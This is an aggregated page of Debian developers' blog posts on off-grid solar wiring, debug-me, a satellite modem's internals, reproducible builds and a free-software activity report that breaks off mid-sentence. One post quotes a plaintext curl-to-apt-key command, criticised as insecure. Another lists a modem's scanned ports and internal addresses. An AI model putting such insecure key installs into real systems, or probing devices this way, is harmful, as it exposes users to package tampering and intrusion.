Search Results: "joeyh"

27 June 2017

Joey Hess: 12 to 24 volt house conversion

Upgrading my solar panels involved switching the house from 12 volts to 24 volts. No reasonably priced charge controllers can handle 1 kW of PV at 12 volts (see the quick calculation after the list below). There might not be a lot of people who need to do this; entirely 12 volt offgrid houses are not super common, and most upgrades these days probably involve rooftop microinverters, and so a switch from DC to AC. I did not find a lot of references online for converting a whole house's voltage from 12V to 24V. To prepare, I first checked that all the fuses and breakers were rated for > 24 volts. (Actually, > 30 volts, because it will be 26 volts or so when charging.) I also checked for any shady wiring, and verified that all the wires I could see in the attic and wiring closet were reasonably sized (10 AWG) and in good shape. Then I:
  1. Turned off every light, unplugged every plug, pulled every fuse and flipped every breaker.
  2. Rewired the battery bank from 12V to 24V.
  3. Connected the battery bank to the new charge controller.
  4. Engaged the main breaker, and waited for anything strange.
  5. Screwed in one fuse at a time.
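For a sense of scale, here is a quick back-of-the-envelope check of why the voltage matters for the wiring and fuse checks above (a minimal sketch in Python; the 1 kW figure comes from the new array, the rest is just power divided by voltage):

def amps(watts, volts):
    # current needed to move a given power at a given nominal voltage
    return watts / volts

pv_watts = 1000   # the new 1 kW array
for volts in (12, 24):
    print("%d W at %d V nominal needs about %.0f A" % (pv_watts, volts, amps(pv_watts, volts)))
# 1000 W at 12 V nominal needs about 83 A
# 1000 W at 24 V nominal needs about 42 A

Halving the current is the whole point of the conversion: the same panels push half as many amps through every fuse, breaker, and wire at 24 V.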
lighting

The house used all fluorescent lights, which have ballasts rated for only 12V. While they work at 24V, they might blow out sooner or overheat. In fact one died this evening, and while it was flickering before, I suspect the 24V did it in. It makes sense to replace them with more efficient LED lights anyway. I found some 12-24V DC LED lights for regular screw-in (Edison) light fixtures. They do not seem very common; Amazon only had a few models, and they shipped from China. I also ordered a 15 foot long, 300 LED strip light, which runs on 24V DC and has an adhesive backing. Great stuff -- it can be cut to different lengths and stuck anywhere. I installed some underneath the cook stove hood and the kitchen cabinets, which didn't have lights before. Similar LED strips are used in some desktop lamps. My lamp was 12V only (barely lit at 24V), but I was able to replace its LED strip, upgrading it to 24V and three times as bright. (Christmas lights are another option; many LED christmas lights run on 24V.)

appliances

The Lenovo laptop power supply I use in the house is a vehicle DC-DC converter, and is rated for 12-24V. It seems to be running fine at 26V, and did not get warm even when charging the laptop up from empty. I'm using buck converters to run various USB powered (5V) ARM boxes such as my sheevaplug. They're quarter sized, so they fit anywhere, and are very efficient. My satellite internet receiver is running off a large buck converter feeding 12V to an inverter, which feeds a 30V DC power supply. That triple conversion is inefficient, but it works for now. The ceiling fan runs on 24V, and does not seem to run much faster than on 12V. It may be rated for 12-24V; I can't find any info about it. The radio is a 12V car radio. I used an LM317 to run it on 24V, to avoid the RF interference a buck converter would have produced. This is a very inefficient conversion; half of the power is wasted as heat (see the quick calculation below). But since I can stream internet radio all day now via satellite, I won't use the FM radio very often. Fridge... still running on propane for now, but I have an idea for a way to build a cold storage battery that will use excess power from the PV array, and keep a fridge at a constant 34 degrees F. Next home improvement project in the queue.
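As a quick sanity check on the LM317 radio supply above: a linear regulator burns the entire input-output voltage difference as heat, so its best-case efficiency is roughly Vout/Vin. A minimal sketch (the 0.5 A radio draw is a made-up illustrative figure, not something from this post):

v_in, v_out = 26.0, 12.0   # charging-voltage input, car radio output
i_load = 0.5               # hypothetical radio current draw, for illustration only

p_delivered = v_out * i_load         # power the radio actually uses
p_wasted = (v_in - v_out) * i_load   # power the LM317 dissipates as heat
print("delivered %.1f W, wasted %.1f W, efficiency about %.0f%%"
      % (p_delivered, p_wasted, 100 * v_out / v_in))
# delivered 6.0 W, wasted 7.0 W, efficiency about 46%

So "half of the power is wasted as heat" is about right whenever the battery bank sits near charging voltage.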

26 June 2017

Joey Hess: DIY solar upgrade complete-ish

Success! I received the Tracer4215BN charge controller, which UPS accidentally-on-purpose delivered to a neighbor, and got it connected up and the battery bank rewired to 24V in a couple hours. [photo: charge controller reading 66.1V at 3.4 amps on panels, charging battery at 29.0V at 7.6A] Here it's charging the batteries at 220 watts, and that picture was taken at 5 pm, when the light hits the panels at nearly a 90 degree angle. Compare with the old panels, where the maximum I ever recorded at high noon was 90 watts. I've made more power since 4:30 pm than I used to be able to make in a day! \o/
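The numbers in that caption also make a nice MPPT sanity check: the controller takes power in at the high string voltage and puts nearly all of it back out at battery voltage. A minimal sketch using only the figures quoted above:

pv_volts, pv_amps = 66.1, 3.4      # panel side, from the display
bat_volts, bat_amps = 29.0, 7.6    # battery side, from the display

p_in = pv_volts * pv_amps          # about 225 W coming in
p_out = bat_volts * bat_amps       # about 220 W going to the battery
print("in %.0f W, out %.0f W, conversion about %.0f%%" % (p_in, p_out, 100 * p_out / p_in))
# in 225 W, out 220 W, conversion about 98%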

23 June 2017

Joey Hess: PV array is hot

Only took a couple hours to wire up and mount the combiner box. [photo: PV combiner box with breakers] Something about larger wiring like this is enjoyable. So much less fiddly than what I'm used to. [photo: PV combiner box wiring] And the new PV array is hot! [photo: multimeter reading 71.71 VDC] Update: The panels have an open circuit voltage of 35.89 and are in strings of 2, so I'd expect to see 71.78 V with only my multimeter connected. So I'm losing 0.07 volts to wiring, which is less than I designed for.

21 June 2017

Joey Hess: DIY professional grade solar panel installation

I've installed 1 kilowatt of solar panels on my roof, using professional grade equipment. The four panels are Astronergy 260 watt panels, and they're mounted on IronRidge XR100 rails. Did it all myself, without help. [photo: house with 4 solar panels on roof] I had three goals for this install:
  1. Cheap but sturdy. Total cost will be under $2500. It would probably cost at least twice as much to get a professional install, and the pros might not even want to do such a small install.
  2. Learn the roof mount system. I want to be able to add more panels, remove panels when working on the roof, and understand everything.
  3. Make every day a sunny day. With my current solar panels, I get around 10x as much power on a sunny day as a cloudy day, and I have plenty of power on sunny days. So 10x the PV capacity should be a good amount of power all the time.
My main concerns were: would I be able to find the rafters when installing the rails, and would the 5x3 foot panels be too unwieldy to get up on the roof by myself?

I was able to find the rafters, without needing a stud finder, after I removed the roof's vent caps, which exposed the rafters. The shingles were on straight enough that I could follow the lines down and drill into a rafter on the first try every time. And I got the rails on spaced well and straight, although I could have spaced the FlashFeet out better (oops). My drill ran out of juice half-way, and I had to hack it to recharge on solar power, but that's another story. Between the learning curve, a lot of careful measurement, not the greatest shoes for roofing, and waiting for recharging, it took two days to get the 8 FlashFeet installed and the rails mounted. Taking a break from that and swimming in the river, I realized I should have been wearing my water shoes on the roof all along. Super soft and nubbly, they make me feel like a gecko up there!

After recovering from an (unrelated) achilles tendon strain, I got the panels installed today. Turns out they're not hard to handle on the roof by myself. Getting them up a ladder to the roof by yourself would normally be another story, but my house has a 2 foot step up from the back retaining wall to the roof, and even has a handy grip beam as you step up. [photo: roof next to the ground with a couple of cinderblock steps] The last gotcha, which I luckily anticipated, is that panels will slide down off the rails before you can get them bolted down. This is where a second pair of hands would have been most useful. But I MacGyvered a solution, attaching temporary clamps before bringing a panel up, which stopped it sliding down while I was attaching it. [photo: clamp temporarily attached to side of panel]

I also finished the outside wiring today, including the one hack of this install so far. Since the local hardware store didn't have a suitable conduit to bring the cables off the roof, I cobbled one together from pipe, with foam inserts to prevent chafing. [photo: some pipe with 5 wires running through it, attached to the side of the roof]

While I have 1 kilowatt of power on my roof now, I won't be able to use it until next week. After ordering the upgrade, I realized that my old PWM charge controller would be able to handle less than half the power, and to get even that I would have needed to mount the fuse box near the top of the roof and run down a large and expensive low-voltage high-amperage cable, around 00 AWG size. Instead, I'll be upgrading to an MPPT controller, and running a single 150 volt cable to it. Then, since the MPPT controller can only handle 1 kilowatt when it's converting to 24 volts, not 12 volts, I'm gonna have to convert the entire house over from 12V DC to 24V DC, including changing all the light fixtures and rewiring the battery bank...
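To make that controller math concrete: a charge controller's output is limited by its current rating times the battery voltage, which is why the same controller that falls short at 12 V can absorb the whole array at 24 V. A rough sketch, assuming a 40 A rating for the new MPPT controller (that rating is an assumption here, not something stated in this post):

controller_amps = 40   # assumed output current rating of the MPPT controller
array_watts = 1000

for battery_volts in (12, 24):
    max_watts = controller_amps * battery_volts
    print("%d V battery bank: a %d A controller tops out around %d W (array is %d W)"
          % (battery_volts, controller_amps, max_watts, array_watts))
# 12 V battery bank: a 40 A controller tops out around 480 W (array is 1000 W)
# 24 V battery bank: a 40 A controller tops out around 960 W (array is 1000 W)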

14 June 2017

Joey Hess: not tabletop solar

Borrowed a pickup truck today to fetch my new solar panels. This is 1 kilowatt of power on my picnic table. [photo: solar panels on picnic table]

5 May 2017

Joey Hess: announcing debug-me

Today I'm excited to release debug-me, a program for secure remote debugging.
Debugging a problem over email/irc/BTS is slow, tedious, and hard. The developer needs to see your problem to understand it. Debug-me aims to make debugging fast, fun, and easy, by letting the developer access your computer remotely, so they can immediately see and interact with the problem. Making your problem their problem gets it fixed fast. A debug-me session is logged and signed with the developer's GnuPG key, producing a chain of evidence of what they saw and what they did. So the developer's good reputation is leveraged to make debug-me secure.
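The real debug-me signs the session with the developer's GnuPG key and has its own efficient protocol (described below); the following is only a toy sketch of the general "chain of evidence" idea, where each logged event commits to the hash of the previous one so a log cannot be quietly reordered or truncated once signed:

import hashlib, json

def append_event(log, seen, typed):
    # each event records the hash of the previous event, forming a chain
    prev = log[-1]["hash"] if log else ""
    body = {"seen": seen, "typed": typed, "prev": prev}
    digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
    # in debug-me, hashes like these are what the developer's key would sign;
    # here we only record them
    log.append({"body": body, "hash": digest})

log = []
append_event(log, seen="$ ls\nfoo.c\n", typed="ls\n")
append_event(log, seen="$ gdb ./foo\n", typed="gdb ./foo\n")
print(log[1]["body"]["prev"] == log[0]["hash"])   # True: the second event is chained to the first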
I've recorded a short screencast demoing debug-me. And here's a screencast about debug-me's chain of evidence. The idea for debug-me came from Re: Debugging over email, and then my Patreon supporters picked debug-me in a poll as a project I should work on. It's been a fun month, designing the evidence chain, building a custom efficient protocol with space saving hacks, using websockets and protocol buffers and ed25519 for the first time, and messing around with low-level tty details. The details of debug-me's development are in my devblog. Anyway, I hope debug-me makes debugging less of a tedious back and forth, at least some of the time. PS: Since debug-me's protocol lets multiple people view the same shell session, and optionally interact with it, there could be uses for it beyond debugging, including live screencasting, pair programming, etc. PPS: There needs to be a debug-me server not run by me, so someone please run one..

27 April 2017

Joey Hess: Exede Surfbeam 2

My new satellite internet connection is from Exede, connecting to the ViaSat 1 bird in geosync orbit. A few technical details that I've observed follow.

antagonistic by design

The "Surfbeam 2 wifi modem" is a closed proprietary system. That is important because it's part of Exede's bandwidth management system. The Surfbeam tracks data use and sends it periodically to Exede. When a user has gone over their monthly priority data, Exede then throttles the bandwidth in various ways -- this throttling seems to be implemented, at least partially, on the Surfbeam itself. (Perhaps by setting QoS flags?) So, if a user could hack their Surfbeam, they could probably bypass the bandwidth caps, or at least some of them. Perhaps Exede would notice eventually. Of course, doing so would surely violate the Exede TOS. If you're renting the modem, like I am, hacking a device you don't own might also subject you to criminal penalties. Needless to say, I don't plan to hack the Surfbeam. But it's been hacked before. So, this is a device that lives in people's homes and is antagonistic to them by design.

weird data throttling

The way the Surfbeam reports data use back to Exede periodically and gets throttling configured has some odd effects sometimes. For example, the Surfbeam can be in a throttled state left over from the previous billing month. When a new billing month begins, it can remain throttled for some time (up to multiple hours) until it sends an update to Exede and they un-throttle it. Data downloaded at that time might still be counted as priority data even though it was throttled. I've seen some good indications of that happening, but am not sure yet. But, I've decided that the throttling doesn't matter for me. Why? ViaSat 1 has many spot beams, and the working-class beam I'm in (most of it is in eastern Kentucky) does not seem to get a lot of use between 7 am and 4:30 pm weekdays. Even when throttled, I often get 300 kb/s - 1 mb/s speeds during the day, which is not a lot worse than the ~2.5 mb/s peak when unthrottled. And that's the time when I want to use broadband -- when the sun is shining and I'm at home at work/play. I'm probably going to switch to a cheaper plan with less priority data, because the priority data is not buying me much. This is a big change from the old FAP, which rendered the satellite no faster than dialup.

a whole network in there

Looking at the ports open on the Surfbeam, some very strange things turned up. First, there are not one, not two, but three separate IPs used by the device, and there are at least two and perhaps three distinct computers involved. There are a lot of flickering LEDs inside the box; a whole network in there.

192.168.100.1 is the satellite controller. It's a Linux box, fingerprinted as kernel 3.10 or so (so full of security holes, presumably), and it's running thttpd/2.25b (which doesn't seem to have any known holes). It seems to have ssh and snmp, but with some port filtering that prevents access. (Note that the above exploit video confirms that snmp is running.) Some machine parsable data is exposed at http://192.168.100.1/index.cgi?page=modemStatusData and http://192.168.100.1/index.cgi?page=triaStatusData. (See the SurfStat program; a small polling sketch appears at the end of this post.)

192.168.1.1 is the wifi router. It has a dns server, an icslap proxy, and nmap thinks it's Linux 3.x with Synology DiskStation Manager (probably the latter is a false positive?). It has its own separate web server for configuration, which is not thttpd. I'm fairly sure this is a separate processor from the other IP address.
192.168.100.2 responds to ICMP, but has no open ports at all. However, it seems to have filtered ssh, telnet, msrpc, microsoft-ds, and port 8090 (probably http), so perhaps it's running all that stuff. This one is definitely a separate processor, located in the satellite dish's TRIA (transmit receive integrated assembly). Verified by disconnecting the dish's coax cable and being unable to ping it.

lack of source code for GPLed software

Exede did not provide anything to me about the GPL licensed source code on the Surfbeam 2. I'm not sure if they're legally required to do so in my case, since they're renting it to me? But they do let you buy the device too, so it's interesting that nothing mentions the licenses of its software and where to get the source code. I'll try to buy it and ask for the source code eventually.

power use

The Surfbeam pulls as much power as two beefy laptops, but it is beaming signals thousands of miles into space, so I give it a bit of a pass. I want to find a way to power it from DC power, but have not had any success with that so far, so am wasting more power to run it on an inverter. Its power supply is rated at 30V and 2.5 amps. Interestingly, I've seen a photo of another Surfbeam power supply that only pulls 1.5 amps. That, and a different case with fewer (external) LEDs, makes me think perhaps the installer stuck me with an old and less efficient version. Maybe they integrated some of those processors into a single board in a newer version, and perhaps made it waste less power as heat. Mine gets pretty warm. I'm currently only able to run it approximately one hour per hour of sun collected by the house. Still on dialup the rest of the time. With the ability to get on broadband when dialup is being painful, being on dialup the rest of the time is perfectly ok. Of course it helps that with tools like git-annex, I'm very well tuned to popping up onto broadband briefly and making it count.
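For reference, here is a minimal sketch of polling the two machine parsable status pages mentioned in the "a whole network in there" section (it assumes you are on the modem's LAN; the format of what comes back isn't documented here, so this just dumps the raw response):

import urllib.request

STATUS_URLS = [
    "http://192.168.100.1/index.cgi?page=modemStatusData",
    "http://192.168.100.1/index.cgi?page=triaStatusData",
]

for url in STATUS_URLS:
    with urllib.request.urlopen(url, timeout=10) as resp:
        print("==", url)
        print(resp.read().decode(errors="replace"))   # raw machine-parsable text from the modem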

17 April 2017

Sylvain Beucler: Practical basics of reproducible builds 3

On my quest to generate reproducible standalone binaries for GNU FreeDink, I met new friends but currently lie defeated by an unexpected enemy... (Previously: Episode 1, Episode 2.)
First, the random build differences when using -Wl,--no-insert-timestamp were explained.
peanalysis shows random build dates:
$ reprotest 'i686-w64-mingw32.static-gcc hello.c -I /opt/mxe/usr/i686-w64-mingw32.static/include -I/opt/mxe/usr/i686-w64-mingw32.static/include/SDL2 -L/opt/mxe/usr/i686-w64-mingw32.static/lib -lmingw32 -Dmain=SDL_main -lSDL2main -lSDL2 -lSDL2main -Wl,--no-insert-timestamp -luser32 -lgdi32 -lwinmm -limm32 -lole32 -loleaut32 -lshell32 -lversion -o hello && chmod 700 hello && analysePE.py hello | tee /tmp/hello.log-$(date +%s); sleep 1' 'hello'
$ diff -au /tmp/hello.log-1*
--- /tmp/hello.log-1490950327   2017-03-31 10:52:07.788616930 +0200
+++ /tmp/hello.log-1523203509   2017-03-31 10:52:09.064633539 +0200
@@ -18,7 +18,7 @@
 found PE header (size: 20)
     machine: i386
     number of sections: 17
-    timedatestamp: -1198218512 (Tue Jan 12 05:31:28 1932)
+    timedatestamp: 632430928 (Tue Jan 16 09:15:28 1990)
     pointer to symbol table: 4593152 (0x461600)
     number of symbols: 11581 (0x2d3d)
     size of optional header: 224
@@ -47,7 +47,7 @@
     Win32VersionValue: 0
     size of image (memory): 4640768
     size of headers (offset to first section raw data): 1536
-    checksum (for drivers): 4927867
+    checksum (for drivers): 4922616
     subsystem: 3
         win32 console binary
     DllCharacteristics: 0
Stephen Kitt mentioned 2 simple patches (1 2) fixing uninitialized memory in binutils. These patches fix the variation and were submitted to MXE (pull request).
Next was playing with compiler support for SOURCE_DATE_EPOCH (which e.g. sets __DATE__ macros).
The FreeDink DFArc frontend historically displays a build date in the About box:
    "Build Date: %s\n", ..., __TDATE__
Sadly, support is only landing upstream in GCC 7 :/
I had to remove that date.
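For reference, the reproducible-builds convention is that a tool which would normally embed the current time should use the SOURCE_DATE_EPOCH environment variable instead, when it is set. A minimal sketch of a build script honouring it (my own illustration, not DFArc's actual code):

import os, time

def build_date():
    # use SOURCE_DATE_EPOCH when set, so rebuilding the same source gives the same date
    epoch = os.environ.get("SOURCE_DATE_EPOCH")
    stamp = int(epoch) if epoch is not None else time.time()
    return time.strftime("%Y-%m-%d", time.gmtime(stamp))

print("Build Date: %s" % build_date())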
Now come the challenging parts. All my tests with reprotest checked out. I started writing a reproducible build environment based on Docker (git browse).
At first I could not run reprotest in the container, so I reworked it with SSH support, and reprotest validated determinism.
(I also generate a reproducible .zip archive, more on that later.) So far so good, but was the release identical when running reprotest successively on the different environments?
(reminder: this is a .exe build that is insensitive to varying path, hence consistent in a full reprotest)
$ sha256sum *.zip
189d0ca5240374896c6ecc6dfcca00905ae60797ab48abce2162fa36568e7cf1  freedink-109.0-bin-buildsh.zip
e182406b4f4d7c3a4d239eee126134ba5c0304bbaa4af3de15fd4f8bda5634a9  freedink-109.0-bin-docker.zip
e182406b4f4d7c3a4d239eee126134ba5c0304bbaa4af3de15fd4f8bda5634a9  freedink-109.0-bin-reprotest-docker.zip
37007f6ee043d9479d8c48ea0a861ae1d79fb234cd05920a25bb3db704828ece  freedink-109.0-bin-reprotest-null.zip
Ouch! Even though both the Docker container and my host are running Stretch, there are differences.
For the two host builds (direct and reprotest), there is a subtle but simple difference: HOME.
HOME is invariably non-existent in reprotest, while my normal compilation environment has an existing home (duh!). This caused a subtle bug when cross-compiling with mingw and wine-binfmt:
  checking whether we are cross compiling... no
  checking whether we are cross compiling... yes
The respective binaries were very different notably due to a different config.h.
This can be fixed by specifying --build in addition to --host when calling ./configure. I suggested reprotest have one of the tests with a valid HOME (#860428).
Now comes the big one: after the fix I still got:
$ sha256sum *.zip
3545270ef6eaa997640cb62d66dc610a328ce0e7d412f24c8f18fdc7445907fd  freedink-109.0-bin-buildsh.zip
cc50ec1a38598d143650bdff66904438f0f5c1d3e2bea0219b749be2dcd2c3eb  freedink-109.0-bin-docker.zip
3545270ef6eaa997640cb62d66dc610a328ce0e7d412f24c8f18fdc7445907fd  freedink-109.0-bin-reprotest-chroot.zip
cc50ec1a38598d143650bdff66904438f0f5c1d3e2bea0219b749be2dcd2c3eb  freedink-109.0-bin-reprotest-docker.zip
3545270ef6eaa997640cb62d66dc610a328ce0e7d412f24c8f18fdc7445907fd  freedink-109.0-bin-reprotest-null.zip
There is consistency on my host, and consistency within docker, but both are different.
Moreover, all the .o files were identical, so something must have gone wrong when compiling the libs, that is, in MXE. After many checks it appears that libstdc++.a is different.
Just overwriting it gets me a consistent FreeDink release on all environments.
Still, when rebuilding it (make gcc), libstdc++.a always has the same environment-dependent checksum.
45f8c5d50a68aa9919ee3602a4e3f5b2bd0333bc8d781d7852b2b6121c8ba27b  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a  # host
6870b84f8e17aec4b5cf23cfe9c2e87e40d9cf59772a92707152361b6ebc1eb4  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a  # docker
The two libraries are very different; there's barely any blue in hexcompare. At that time, I realized that the Docker "official" Debian images are not really official, as Joey explains.
Could it be that Docker maliciously tampered with the compiler, as Ken Thompson warned in 1984?? Well, before jumping to conclusions, let's mix & match.
$ sudo env -i /usr/sbin/chroot chroot-docker/
$ exec bash -l
$ cd /opt/mxe
$ touch src/gcc.mk
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a 
6870b84f8e17aec4b5cf23cfe9c2e87e40d9cf59772a92707152361b6ebc1eb4  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
$ make gcc
[build]     gcc                    i686-w64-mingw32.static
[done]      gcc                    i686-w64-mingw32.static                                 2709464 KiB    7m2.039s
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a 
45f8c5d50a68aa9919ee3602a4e3f5b2bd0333bc8d781d7852b2b6121c8ba27b  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
# consistent with host builds
$ sudo tar -C chroot -c . | docker import - chroot-debootstrap
$ docker run -ti chroot-debootstrap /bin/bash
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
45f8c5d50a68aa9919ee3602a4e3f5b2bd0333bc8d781d7852b2b6121c8ba27b  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
$ touch src/gcc.mk
$ make gcc
[build]     gcc                    i686-w64-mingw32.static
[done]      gcc                    i686-w64-mingw32.static                                 2709412 KiB    7m6.608s
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
6870b84f8e17aec4b5cf23cfe9c2e87e40d9cf59772a92707152361b6ebc1eb4  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
# consistent with docker builds
So, AFAICS, with the same build recipe, depending on whether we are running in a container or not, we get a consistent but different libstdc++.a. This kind of issue is not detected with a simple reprotest build, as it only tests variations within a fixed build environment.
This is quite worrisome, I intend to use a container to control my build environment, but I can't guarantee that the container technology will be exactly the same 5 years from now. All my setup is simple and available for inspection at https://git.savannah.gnu.org/cgit/freedink.git/tree/autobuild/freedink-w32-snapshot/. I'd very much welcome enlightenment :)

11 April 2017

Joey Hess: starting debug-me and a new devblog

I've started building debug-me. It's my birthday, and building a new program is kind of my birthday gift to myself, because I love starting a new program and seeing where it goes. (Also, my Patreon backers wanted me to get on with building debug-me.) I also have a new devblog! Up until now, I've had a devblog that only covered work on git-annex. That one continues, but the new devblog is for development journaling for any project I'm working on. http://joeyh.name/devblog/

1 April 2017

Antoine Beaupré: My free software activities, February and March 2017

Looking into self-financing

Before I begin, I should mention that I started tracking my time working on free software more systematically. I spend a lot of time on the computer, as regular readers of this blog might remember, so I wanted to know exactly how much of that time was paid vs free work. I was already using org-mode's time clock system to keep track of my work hours, so I just extended this to my regular free software contributions, which also helps in writing these reports. It turns out that over 60% of my computer time is spent working on free software. That's huge! I was expecting something more in the range of 20 to 40% of my time. So I started thinking about ways of financing this work. I created a Patreon page, but I'm hesitant to launch such a campaign: the only thing worse than "no Patreon page" is "a Patreon page with failed goals and no one financing it". So before starting such an effort, I'd like to get a feeling for what other people's experiences with it are. I know that joeyh is close to achieving his goals, but I can't compare with the guy that invented git-annex or debhelper, so I'm concerned I wouldn't be able to raise the same level of funding. So if you have any advice, feel free to contact me in private or in the comments. If you would be ready to fund my work, I'd love to know about it, obviously, but I guess I wouldn't get real numbers until I actually open up such a page... Now, onto the regular report.

Wallabako

I spent a good chunk of time completing most of the things I had in mind for Wallabako, which I mentioned quickly in the previous report. Wallabako is now much easier to install, with clearer instructions, an easier to use configuration file, more reliable synchronization and read status propagation. As usual, the Wallabako README file has all the details. I've also looked at better integration with Koreader, the free software e-reader that forms the basis of the okreader free software distribution, which has been able to port Debian to the Kobo e-readers, a project I am really excited about. This project has the potential of supporting Kobo readers beyond the lifetime that upstream grants them, and removes a lot of proprietary software and spyware that ships with the Kobo readers. So I have made a few contributions to okreader and also to koreader, the ebook reader okreader is based on.

Stressant

I rewrote stressant, my simple burn-in and stress-testing tool. After struggling in turn with Debirf, live-build, vmdebootstrap and even FAI, I just figured maybe it wasn't the best idea to try and reinvent that particular wheel: instead of reinventing how to build yet another Debian system build tool, maybe I should just reuse what's already there. It turns out there's a well known, successful and fairly complete recovery system called Grml. It is a Debian derivative, so all I needed to do was to stop procrastinating and actually write the stressant tool, instead of just creating a distribution with a bunch of random tools shipped in. This allowed me to focus on which tools were the best to stress test different components. This selection ended up including fio, which can also be used to overwrite disk drives with the proper options (--overwrite and --size=100%), although grml also ships with nwipe for wiping old spinning disks and hdparm to do a secure erase of SSD disks (whatever that's worth). Stressant still needs to be shipped with grml for this transition to be complete. In the meantime, I was able to configure the excellent public Gitlab CI service to provide ISO images with Stressant built in as a stopgap measure. I also need to figure out a way to automate starting stressant from a boot menu to automate deployments on a larger scale, although because I have little need for the feature at this moment in time, this will likely wait for a sponsor to show up. Still, stressant has useful features like the capability of sending logs by email using a fresh new implementation of the Python SMTPHandler (BufferedSMTPHandler), which waits for logging to complete before sending a single email. Another interesting piece of code in there is the NegateAction argparse handler that enables the use of "toggle flags" (e.g. --flag / --no-flag). I'm so happy with the code that I figure I could just share it here directly:
import argparse

class NegateAction(argparse.Action):
    '''add a toggle flag to argparse

    this is similar to 'store_true' or 'store_false', but allows
    arguments prefixed with --no to disable the default. the default
    is set depending on the first argument - if it starts with the
    negative form (defined by default as '--no'), the default is False,
    otherwise True.
    '''
    negative = '--no'
    def __init__(self, option_strings, *args, **kwargs):
        '''set default depending on the first argument'''
        default = not option_strings[0].startswith(self.negative)
        super(NegateAction, self).__init__(option_strings, *args,
                                           default=default, nargs=0, **kwargs)
    def __call__(self, parser, ns, values, option):
        '''set the truth value depending on whether
        it starts with the negative form'''
        setattr(ns, self.dest, not option.startswith(self.negative))
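For completeness, a minimal usage sketch (my own example, not taken from stressant):

parser = argparse.ArgumentParser()
parser.add_argument('--color', '--no-color', dest='color', action=NegateAction,
                    help='enable or disable colored output')
print(parser.parse_args([]).color)              # True, the default taken from '--color'
print(parser.parse_args(['--no-color']).color)  # False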
Short and sweet. I wonder why stuff like this is not in the standard library yet - maybe just because no one bothered yet? It'd be great to get feedback from more experienced Pythonistas on this one. I hope that my work on Stressant is complete. I get zero funding for this work, and have little use for it myself: I manage only a few machines, and such a tool really shines when you regularly put new hardware online, which is (fortunately?) not my case anymore. I'd be happy, of course, to accompany organisations and people that wish to further develop and use such a tool. A short demo of stressant, as well as a detailed description of how it works, is of course available in its README file.

Standard third party repositories

After looking at improvements for the grml repository instructions, I realized there was no real "best practices" document on how to configure an Apt repository. Sure, there are tools like reprepro and others, but those hardly qualify as policy: they are very flexible, and there are lots of ways to create insecure repositories or curl | sh style instructions, which we of course generally want to avoid. While the larger problem of Untrusted Debian packages remains generally unsolved (e.g. when you install any .deb file, it can get root on your system), it seemed to me one critical part of this problem was how to add a random third-party repository to your machine while limiting, as much as possible, what possible attackers could do with such a repository. In other words, to solve the more general problem of insecure .deb files, we also need to solve the distribution problem, otherwise fixing the .deb files themselves will be useless. This led to the creation of standardized repository instructions that define:
  1. how to distribute the repository's public signing key (ie. over HTTPS)
  2. how to name suites and components (e.g. use stable and main unless you have a good reason, and explain yourself)
  3. recommend a healthy dose of apt preferences pinning
  4. how to distribute keys (e.g. with a deriv-archive-keyring package)
I've seen so many third party repositories get this wrong. For example, a lot of repositories recommend this type of command to initialize the OpenPGP trust path:
curl http://example.com/key.asc | apt-key add -
This has the following problems:
  • the key is transferred in plaintext and can easily be manipulated by an active attacker (e.g. a router on your path to the server or a neighbor in a Wifi cafe)
  • the key is added to the main trust root, which allows the key to authenticate as the real Debian archive, therefore giving it all rights over all packages
  • since it's part of the global archive, it's difficult for a package to remove/add the key when a key rollover is necessary (and repositories generally don't provide a deriv-archive-keyring to do that process anyways)
An example of this is the Docker install instructions, which, at least, manage to do this over HTTPS. Some other repositories don't even bother teaching people about the proper way of adding those keys. We settled for:
wget -O /usr/share/keyrings/deriv-archive-keyring.gpg https://deriv.example.net/debian/deriv-archive-keyring.gpg
That location was explicitly chosen to be out of the main trust directory, so that it needs to be explicitly added to the sources.list as well:
deb [signed-by=/usr/share/keyrings/deriv-archive-keyring.gpg] https://deriv.example.net/debian/ stable main
Similarly, we highly recommend users set up "apt pinning" to restrict what a given repository can do. Since pinning is so confusing, most people don't actually bother even configuring it, and I have yet to see a single repo advise its users to configure those preferences, which are essential to limit what a repository can do. To keep configuration simple, we recommend this:
Package: *
Pin: origin deriv.example.net
Pin-Priority: 100
Obviously, for a single-package repository, the actual package name should be listed, e.g.:
Package: foo
Pin: origin deriv.example.net
Pin-Priority: 100
And the priority should probably be set to 1 unless you want to allow automatic upgrades. It is my hope that this design will get more traction in the years to come and become a de-facto standard that will be a key part in safely adding third party repositories. There is obviously much more work to be done to improve security when installing untrusted .deb files, and I encourage Debian developers to consider contributing to the UntrustedDebs discussions and particularly to the Teams/Dpkg/Spec/DeclarativePackaging work.

Signal R&D

I spent a significant amount of time this month struggling with the Signal project on my phone. I'm still ambivalent on Signal: it's a centralized design, too dependent on phone numbers, but I must admit they get a lot of things right and it's the only free-software platform that allows for easy-to-use, multi-platform videoconferencing that my family can use. I've been following Signal for a while: up until now, I had been using the LibreSignal rebuild of the official client, as it is distributed on a F-Droid repository. Because I try to avoid Google (proprietary) software on my phone, it's basically the only way I could even install Signal. Unfortunately, the repository is out of date and introduces another point of trust in the distribution model: now you not only need to trust the Signal authors to do the right thing, you also need to trust that F-Droid repo not to inject nasty code on your phone. I've therefore started a discussion about how Signal could be distributed outside of the Google Play Store. I'd like to think it's one of the things that led the Signal people to distribute an official copy of Signal outside of the Play Store. After much struggling, I was able to upgrade to this official client and will be able to upgrade easily by just downloading the APK. (Do note that I ended up reinstalling and re-registering Signal, which unfortunately changed my secret keys.) I do hope Signal enters F-Droid one day, but it could take a while because it still doesn't work without Google services and barely works with MicroG, the free software alternative to the Google services clients. Moxie also set a list of requirements, like crash reporting and statistics, that 